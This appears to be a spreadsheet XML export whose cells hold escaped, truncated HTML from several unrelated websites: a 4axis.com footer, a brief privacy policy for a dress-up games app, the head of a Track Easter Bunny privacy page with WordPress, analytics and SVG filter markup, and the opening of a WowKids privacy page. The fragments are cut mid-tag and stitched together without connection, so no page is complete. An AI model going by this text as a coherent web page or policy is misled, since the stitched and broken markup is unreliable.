&lt;li id="menu-item-1266" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1266"&gt;&lt;a href="https://4axis.com/contact" data-title="Contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;        &lt;div class="copyright"&gt;
            &lt;p class="copyright-text"&gt;&lt;span&gt;Copyright © 2023 4AXIS TECHNOLOGIES PTE LTD&lt;/span&gt; &lt;span&gt;All rights reserved.&lt;/span&gt;&lt;/p&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;&lt;script src="https://4axis.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.1" id="swv-js"&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='contact-form-7-js-extra'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var wpcf7 = {"api":{"root":"https:\/\/4axis.com\/wp-json\/","namespace":"contact-form-7\/v1"}};
/* ]]&gt; */
&lt;/script&gt;
&lt;script src="https://4axis.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.1" id="contact-form-7-js"&gt;&lt;/script&gt;
&lt;script src="https://4axis.com/wp-includes/js/jquery/jquery.form.min.js?ver=4.3.0" id="jquery-form-js"&gt;&lt;/script&gt;
&lt;script src="https://4axis.com/wp-content/plugins/bootstrap-for-contact-form-7/assets/dist/js/scripts.min.js?ver=1.4.8" id="contact-form-7-bootstrap-js"&gt;&lt;/script&gt;
&lt;script src="https://4axis.com/wp-content/themes/4axis_v2/layout/assets/scripts/socialshare.js?ver=1.0.0" id="js/socialshare-js"&gt;&lt;/script&gt;
&lt;script src="https://4axis.com/wp-content/themes/4axis_v2/layout/assets/scripts/validator-custom.js?ver=1.0.0" id="js/validator-custom-js"&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='ajax-script-js-extra'&gt;
/* &lt;! [CDATA[ */
var ajax_object = {"ajax_url":"https:\/\/4axis.com\/wp-admin\/admin-ajax.php","theme_url":"https:\/\/4axis.com\/wp-content\/themes\/tesseract"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script src="https://4axis.com/wp-content/themes/4axis_v2/layout/assets//scripts/ajax.js?ver=1.0.0" id="ajax-script-js"&gt;&lt;/script&gt;
&lt;script src="https://4axis.com/wp-content/themes/4axis_v2/layout/assets/scripts/plugins.min.js?ver=1.0.0" id="js/vendor-js"&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='js/main-js-extra'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t xml:space="preserve">[CDATA[ */
var ajax_object = {"ajax_url":"https:\/\/4axis.com\/wp-admin\/admin-ajax.php","theme_url":"https:\/\/4axis.com\/wp-content\/themes\/tesseract"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script src="https://4axis.com/wp-content/themes/4axis_v2/layout/assets/scripts/main.js?ver=1.0.0" id="js/main-js"&gt;&lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;
&lt;/head&gt;
	&lt;body&gt;
		&lt;p&gt;&lt;em&gt;Last updated: 22 Nov 2022&lt;/em&gt;&lt;/p&gt;
		&lt;h1&gt;Dress Up Makeover Girls Games - Privacy Policy&lt;/h1&gt;
		&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Data Access&lt;/b&gt;
	&lt;p&gt;
		 We don't store your personal data like your email id, phone number or any other personal details on our servers. We are focused on offering the best products to users and not interested to use this data for marketing purpose or do anything like selling/sharing with other companies.
	</t>
  </si>
  <si>
    <t xml:space="preserve">Our privacy policy may change from time to time. If we make any material changes to our policies, we will place a prominent notice on our website or application.
	 &lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Contact Information&lt;/b&gt;
	&lt;p&gt;
		If you have any questions or concerns about our privacy policies, please send a mail to us on support at topdressupgames@gmail.com
	&lt;/p&gt;
&lt;/p&gt;
	&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head &gt;
&lt;meta charset="UTF-8" /&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1" /&gt;
&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;link rel="preload" href="https://trackeasterbunny.com/wp-content/plugins/rate-my-post/public/css/fonts/ratemypost.ttf" type="font/ttf" as="font" crossorigin="anonymous"&gt;
	&lt;!-- This site is optimized with the Yoast SEO Premium plugin v20.4 (Yoast SEO v20.4) - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy - Track Easter Bunny&lt;/title&gt;
	&lt;meta name="description" content="This Privacy Policy governs the manner in which Track Easter Bunny collects, uses, maintains and discloses information collected from users of the trackeasterbunny.com website." /&gt;
	&lt;link rel="canonical" href="https://trackeasterbunny.com/privacy-policy" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy" /&gt;
	&lt;meta property="og:description" content="This Privacy Policy governs the manner in which Track Easter Bunny collects, uses, maintains and discloses information collected from users of the trackeasterbunny.com website."</t>
  </si>
  <si>
    <t xml:space="preserve">/&gt;
	&lt;meta property="og:url" content="https://trackeasterbunny.com/privacy-policy" /&gt;
	&lt;meta property="og:site_name" content="Track Easter Bunny" /&gt;
	&lt;meta property="article:publisher" content="https://www.facebook.com/trackeasterbunny" /&gt;
	&lt;meta property="article:modified_time" content="2021-02-04T00:03:42+00:00" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:site" content="@bunnytracking" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="20 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://trackeasterbunny.com/privacy-policy","url":"https://trackeasterbunny.com/privacy-policy","name":"Privacy Policy - Track Easter Bunny","isPartOf":{"@id":"https://trackeasterbunny.com/#website"},"datePublished":"2013-02-13T06:03:01+00:00","dateModified":"2021-02-04T00:03:42+00:00","description":"This Privacy Policy governs the manner in which Track Easter Bunny collects, uses, maintains and discloses information collected from users of the trackeasterbunny.com website. ","breadcrumb":{"@id":"https://trackeasterbunny.com/privacy-policy#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://trackeasterbunny.com/privacy-policy"]}]},{"@type":"BreadcrumbList","@id":"https://trackeasterbunny.com/privacy-policy#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://trackeasterbunny.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://trackeasterbunny.com/#website","url":"https://trackeasterbunny.com/","name":"Track Easter Bunny","description":"","publisher":{"@id":"https://trackeasterbunny.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://trackeasterbunny.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://trackeasterbunny.com/#organization","name":"Track Easter Bunny","url":"https://trackeasterbunny.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://trackeasterbunny.com/#/schema/logo/image/","url":"https://trackeasterbunny.com/wp-content/uploads/2015/03/Text.png","contentUrl":"https://trackeasterbunny.com/wp-content/uploads/2015/03/Text.png","width":800,"height":239,"caption":"Track Easter Bunny"},"image":{"@id":"https://trackeasterbunny.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/trackeasterbunny","https://twitter.com/bunnytracking","https://www.youtube.com/channel/UC95Usl_sSeyBg3fSnRT_PwQ","https://www.instagram.com/trackeasterbunny/"]}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO Premium plugin. --&gt;
&lt;link rel='dns-prefetch' href='//www.googletagmanager.com' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//c0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//i0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//jetpack.wordpress.com' /&gt;
&lt;link rel='dns-prefetch' href='//s0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//public-api.wordpress.com' /&gt;
&lt;link rel='dns-prefetch' href='//0.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//1.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//2.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//widgets.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//pagead2.googlesyndication.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Track Easter Bunny &amp;raquo; Feed" href="https://feeds.feedburner.com/trackeasterbunny" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Track Easter Bunny &amp;raquo; Comments Feed" href="https://trackeasterbunny.com/comments/feed" /&gt;
&lt;script type="text/javascript"&gt;
</t>
  </si>
  <si>
    <t>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/trackeasterbunny.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};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 o.length;r++)t.supports[o[r]]=function(e){if(p&amp;&amp;p.fillText)switch(p.textBaseline="top",p.font="600 32px</t>
  </si>
  <si>
    <t>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[129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}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id='q-a-plus-css' href='https://trackeasterbunny.com/wp-content/plugins/q-and-a/css/q-a-plus.css?ver=1' type='text/css' media='screen' /&gt;
&lt;link rel='stylesheet' id='metro-pro-theme-css' href='https://trackeasterbunny.com/wp-content/themes/metro-pro/style.css?ver=2.0.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/6.1.1/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /&gt;
&lt;style id='wp-block-library-inline-css' type='text/css'&gt;
.has-text-align-justify{text-align:justify;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/6.1.1/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/6.1.1/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://c0.wp.com/c/6.1.1/wp-includes/css/classic-themes.min.css'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t>
  </si>
  <si>
    <t xml:space="preserve">important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='arevico_scsfbcss-css' href='https://trackeasterbunny.com/wp-content/plugins/facebook-page-promoter-lightbox/includes/featherlight/featherlight.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='rate-my-post-css' href='https://trackeasterbunny.com/wp-content/plugins/rate-my-post/public/css/rate-my-post.css?ver=3.4.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='jquery-ui-css' href='https://trackeasterbunny.com/wp-content/plugins/soundy-background-music/css/jquery-ui-1.12.1/jquery-ui.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='soundy_front_end-css' href='https://trackeasterbunny.com/wp-content/plugins/soundy-background-music/css/style-front-end.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='h5p-plugin-styles-css' href='https://trackeasterbunny.com/wp-content/plugins/h5p/h5p-php-library/styles/h5p.css?ver=1.15.6' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='google-font-css' href='//fonts.googleapis.com/css?family=Oswald%3A400&amp;#038;ver=2.0.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='tablepress-default-css' href='https://trackeasterbunny.com/wp-content/plugins/tablepress/css/build/default.css?ver=2.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-notice-front-css' href='https://trackeasterbunny.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='social-logos-css' href='https://c0.wp.com/p/jetpack/12.0/_inc/social-logos/social-logos.min.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/12.0/css/jetpack.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fontawesome-css' href='//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=4.3.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='google-font-montserrat-css' href='//fonts.googleapis.com/css?family=Montserrat%3A400&amp;#038;ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='google-font-roboto-slab-css' href='//fonts.googleapis.com/css?family=Roboto+Slab%3A400&amp;#038;ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='qb-css' href='https://trackeasterbunny.com/wp-content/plugins/quickiebar/public/style/qb.css?ver=1.8.4' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://trackeasterbunny.com/wp-content/plugins/facebook-page-promoter-lightbox/includes/featherlight/featherlight.js?ver=6.1.1' id='arevico_scsfb-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='arevico_scsfb_launch-js-extra'&gt;
/* &lt;! [CDATA[ */
var lb_l_ret = {"width":"400","height":"255","delay":"12000","coc":"1","fb_id":"trackeasterbunny","cooc":"0","display_on_all":"1","display_on_page":"1","display_on_post":"1","display_on_homepage":"1","display_on_archive":"1","show_once":"1","min":"2","performance":"0"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://trackeasterbunny.com/wp-content/plugins/facebook-page-promoter-lightbox/includes/launch/launch.js?ver=6.1.1' id='arevico_scsfb_launch-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://trackeasterbunny.com/wp-content/plugins/soundy-background-music/js/front-end.js?ver=6.1.1' id='soundy-front-end-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://trackeasterbunny.com/wp-content/themes/metro-pro/js/backstretch.js?ver=1.0.0' id='metro-pro-backstretch-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='metro-pro-backstretch-set-js-extra'&gt;
/* &lt;! [CDATA[ */
var BackStretchImg = {"src":"https:\/\/trackeasterbunny.com\/wp-content\/uploads\/2020\/04\/Clouds-66.7s-1366px.png"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://trackeasterbunny.com/wp-content/themes/metro-pro/js/backstretch-set.js?ver=1.0.0' id='metro-pro-backstretch-set-js'&gt;&lt;/script&gt;
&lt;script async type='text/javascript' id='cookie-notice-front-js-before'&gt;
var cnArgs = {"ajaxUrl":"https:\/\/trackeasterbunny.com\/wp-admin\/admin-ajax.php","nonce":"502f39f51b","hideEffect":"fade","position":"bottom","onScroll":false,"onScrollOffset":100,"onClick":false,"cookieName":"cookie_notice_accepted","cookieTime":2592000,"cookieTimeRejected":2592000,"globalCookie":false,"redirection":false,"cache":false,"revokeCookies":false,"revokeCookiesOpt":"automatic"};
&lt;/script&gt;
</t>
  </si>
  <si>
    <t>&lt;script async type='text/javascript' src='https://trackeasterbunny.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.4.8' id='cookie-notice-front-js'&gt;&lt;/script&gt;
&lt;!-- Google Analytics snippet added by Site Kit --&gt;
&lt;script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-4881048-55' id='google_gtagjs-js' async&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='google_gtagjs-js-after'&gt;
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["trackeasterbunny.com"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-4881048-55", {"anonymize_ip":true});
&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End Google Analytics snippet added by Site Kit --&gt;
&lt;link rel="https://api.w.org/" href="https://trackeasterbunny.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://trackeasterbunny.com/wp-json/wp/v2/pages/97" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://trackeasterbunny.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://trackeasterbunny.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;link rel='shortlink' href='https://trackeasterbunny.com/?p=97' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://trackeasterbunny.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftrackeasterbunny.com%2Fprivacy-policy" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://trackeasterbunny.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftrackeasterbunny.com%2Fprivacy-policy&amp;#038;format=xml" /&gt;
&lt;meta name="generator" content="Site Kit by Google 1.96.0" /&gt;&lt;!-- Q &amp; A --&gt;
		&lt;noscript&gt;&lt;link rel="stylesheet" type="text/css" href="https://trackeasterbunny.com/wp-content/plugins/q-and-a/css/q-a-plus-noscript.css?ver=1" /&gt;&lt;/noscript&gt;&lt;!-- Q &amp; A --&gt;&lt;meta name="google-site-verification" content="1y-B0vxixxV2DHlrG9lu3c1Bd9Oi3Craxo0p1flj4zY" /&gt;
	&lt;style&gt;img#wpstats{display:none}&lt;/style&gt;
		&lt;link rel="pingback" href="https://trackeasterbunny.com/xmlrpc.php" /&gt;
&lt;style type="text/css"&gt;.site-title a { background: url(https://trackeasterbunny.com/wp-content/uploads/2017/04/cropped-Text.png) no-repeat !</t>
  </si>
  <si>
    <t>important; }&lt;/style&gt;
&lt;!-- Google AdSense snippet added by Site Kit --&gt;
&lt;meta name="google-adsense-platform-account" content="ca-host-pub-2644536267352236"&gt;
&lt;meta name="google-adsense-platform-domain" content="sitekit.withgoogle.com"&gt;
&lt;!-- End Google AdSense snippet added by Site Kit --&gt;
			&lt;style type="text/css"&gt;
				/*</t>
  </si>
  <si>
    <t>If html does not have either class, do not show lazy loaded images. */
				html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image {
					display: none;
				}
			&lt;/style&gt;
			&lt;script&gt;
				document.documentElement.classList.add(
					'jetpack-lazy-images-js-enabled'
				);
			&lt;/script&gt;
&lt;!-- Google AdSense snippet added by Site Kit --&gt;
&lt;script async="async" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-7104766140922052&amp;amp;host=ca-host-pub-2644536267352236" crossorigin="anonymous" type="text/javascript"&gt;&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End Google AdSense snippet added by Site Kit --&gt;
&lt;link rel="icon" href="https://i0.wp.com/trackeasterbunny.com/wp-content/uploads/2019/12/cropped-Bunny.png?fit=32%2C32&amp;#038;ssl=1" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://i0.wp.com/trackeasterbunny.com/wp-content/uploads/2019/12/cropped-Bunny.png?fit=192%2C192&amp;#038;ssl=1" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://i0.wp.com/trackeasterbunny.com/wp-content/uploads/2019/12/cropped-Bunny.png?fit=180%2C180&amp;#038;ssl=1" /&gt;
&lt;meta name="msapplication-TileImage" content="https://i0.wp.com/trackeasterbunny.com/wp-content/uploads/2019/12/cropped-Bunny.png?fit=270%2C270&amp;#038;ssl=1" /&gt;
&lt;/head&gt;
&lt;body data-rsssl=1 class="page-template-default page page-id-97 custom-background custom-header header-image header-full-width full-width-content genesis-breadcrumbs-hidden genesis-footer-widgets-visible metro-pro-blue cookies-not-set"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" &gt;&lt;defs&gt;&lt;filter id="wp-duotone-dark-grayscale"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;feComponentTransfer color-interpolation-filters="sRGB" &gt;&lt;feFuncR type="table" tableValues="0 0.49803921568627" /&gt;&lt;feFuncG type="table" tableValues="0 0.49803921568627" /&gt;&lt;feFuncB type="table" tableValues="0 0.49803921568627" /&gt;&lt;feFuncA</t>
  </si>
  <si>
    <t>type="table" tableValues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;feComposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" &gt;&lt;defs&gt;&lt;filter id="wp-duotone-grayscale"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;feComponentTransfer color-interpolation-filters="sRGB" &gt;&lt;feFuncR type="table" tableValues="0 1" /&gt;&lt;feFuncG type="table" tableValues="0 1" /&gt;&lt;feFuncB type="table" tableValues="0 1"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</si>
  <si>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 &gt;&lt;defs&gt;&lt;filter id="wp-duotone-purple-yellow"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0</t>
  </si>
  <si>
    <t>.299 .587 .114 0 0 " /&gt;&lt;feComponentTransfer color-interpolation-filters="sRGB" &gt;&lt;feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /&gt;&lt;feFuncG type="table" tableValues="0 1" /&gt;&lt;feFuncB type="table" tableValues="0.71764705882353 0.25490196078431" /&gt;&lt;feFuncA</t>
  </si>
  <si>
    <t>type="table" tableValues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;feComposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" &gt;&lt;defs&gt;&lt;filter id="wp-duotone-blue-red"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;feComponentTransfer color-interpolation-filters="sRGB" &gt;&lt;feFuncR type="table" tableValues="0 1" /&gt;&lt;feFuncG type="table" tableValues="0 0.27843137254902" /&gt;&lt;feFuncB type="table" tableValues="0.5921568627451 0.27843137254902"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</si>
  <si>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 &gt;&lt;defs&gt;&lt;filter id="wp-duotone-midnight"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0</t>
  </si>
  <si>
    <t>/&gt;&lt;feComponentTransfer color-interpolation-filters="sRGB" &gt;&lt;feFuncR type="table" tableValues="0 0" /&gt;&lt;feFuncG type="table" tableValues="0 0.64705882352941" /&gt;&lt;feFuncB type="table" tableValues="0 1"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</si>
  <si>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 &gt;&lt;defs&gt;&lt;filter id="wp-duotone-magenta-yellow"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;feComponentTransfer color-interpolation-filters="sRGB" &gt;&lt;feFuncR type="table" tableValues="0.78039215686275 1" /&gt;&lt;feFuncG type="table" tableValues="0 0.94901960784314" /&gt;&lt;feFuncB type="table" tableValues="0.35294117647059 0.47058823529412"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</si>
  <si>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 &gt;&lt;defs&gt;&lt;filter id="wp-duotone-purple-green"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0</t>
  </si>
  <si>
    <t>/&gt;&lt;feComponentTransfer color-interpolation-filters="sRGB" &gt;&lt;feFuncR type="table" tableValues="0.65098039215686 0.40392156862745" /&gt;&lt;feFuncG type="table" tableValues="0 1" /&gt;&lt;feFuncB type="table" tableValues="0.44705882352941 0.4"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 &gt;&lt;defs&gt;&lt;filter id="wp-duotone-blue-orange"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0</t>
  </si>
  <si>
    <t>.299 .587 .114 0 0 " /&gt;&lt;feComponentTransfer color-interpolation-filters="sRGB" &gt;&lt;feFuncR type="table" tableValues="0.098039215686275 1" /&gt;&lt;feFuncG type="table" tableValues="0 0.66274509803922" /&gt;&lt;feFuncB type="table" tableValues="0.84705882352941 0.41960784313725" /&gt;&lt;feFuncA</t>
  </si>
  <si>
    <t>type="table" tableVa</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="ru-RU" prefix="og: http://ogp.me/ns#"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
	&lt;link rel="profile" href="https://gmpg.org/xfn/11"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"&gt;
    &lt;meta property="og:image" content="https://eruditoplus.com/core/assets/wooow/dist/img/logo.svg"&gt;
    &lt;!-- Favicons --&gt;
    &lt;link rel="icon" type="image/png" href="https://eruditoplus.com/core/assets/wooow/dist/img/favicon/favicon.ico"&gt;
    &lt;!-- Fonts --&gt;
    &lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Ubuntu:400,500,700&amp;amp;subset=cyrillic" media="all" rel="stylesheet"&gt;
    &lt;!-- Chrome, Firefox OS and Opera --&gt;
    &lt;meta name="theme-color" content="#6ad2e5"&gt;
    &lt;!-- Windows Phone --&gt;
    &lt;meta name="msapplication-navbutton-color" content="#6ad2e5"&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>iOS Safari --&gt;
    &lt;meta name="apple-mobile-web-app-status-bar-style" content="#6ad2e5"&gt;
	&lt;title&gt;Политика приватности &amp;ndash; WowKids&lt;/title&gt;
&lt;!-- This site is optimized with the Yoast SEO plugin v9.4 - https://yoast.com/wordpress/plugins/seo/ --&gt;
&lt;link rel="canonical" href="https://eruditoplus.com/privacy-policy/" /&gt;
&lt;meta property="og:locale" content="ru_RU" /&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Политика приватности &amp;ndash; WowKids" /&gt;
&lt;meta property="og:description" content="Privacy policy (updated version published in May 2021) Hi All, We, &amp;#171;ERUDITO PLUS&amp;#187; Sp. z o.o., a company incorporated under the laws of the Republic of Poland , registered address: Nowogrodzka street, h 50, office 515, 00-695 Warsaw Poland, registration number:  385722166 (hereinafter referred to as “We”, “Company”, and &amp;#171;Wow Kids&amp;#187;), have prepared this Privacy Policy &amp;hellip;" /&gt;
&lt;meta property="og:url" content="https://eruditoplus.com/privacy-policy/" /&gt;
&lt;meta property="og:site_name" content="WowKids" /&gt;
&lt;meta property="article:publisher" content="https://www.facebook.com/wooowkids" /&gt;
&lt;meta name="twitter:card" content="summary_large_image" /&gt;
&lt;meta name="twitter:description" content="Privacy policy (updated version published in May 2021)</t>
  </si>
  <si>
    <t>Hi All, We, &amp;#171;ERUDITO PLUS&amp;#187; Sp. z o.o., a company incorporated under the laws of the Republic of Poland , registered address: Nowogrodzka street, h 50, office 515, 00-695 Warsaw Poland, registration number:  385722166 (hereinafter referred to as “We”, “Company”, and &amp;#171;Wow Kids&amp;#187;), have prepared this Privacy Policy [&amp;hellip;]" /&gt;
&lt;meta name="twitter:title" content="Политика приватности &amp;ndash; WowKids" /&gt;
&lt;script type='application/ld+json'&gt;{"@context":"https://schema.org","@type":"Organization","url":"https://eruditoplus.com/","sameAs":["https://www.facebook.com/wooowkids","https://www.instagram.com/wooowkids/","https://www.linkedin.com/company/wowkids","https://www.youtube.com/user/DevMageApp"],"@id":"https://eruditoplus.com/#organization","name":"WowKids","logo":"http://wowkids.io/wp-content/uploads/2019/01/logo.svg-2019-01-15-18-07-57.png"}&lt;/script&gt;
&lt;!-- / Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="WowKids &amp;raquo; Лента" href="https://eruditoplus.com/feed/" /&gt;
		&lt;script type="text/javascript"&gt;
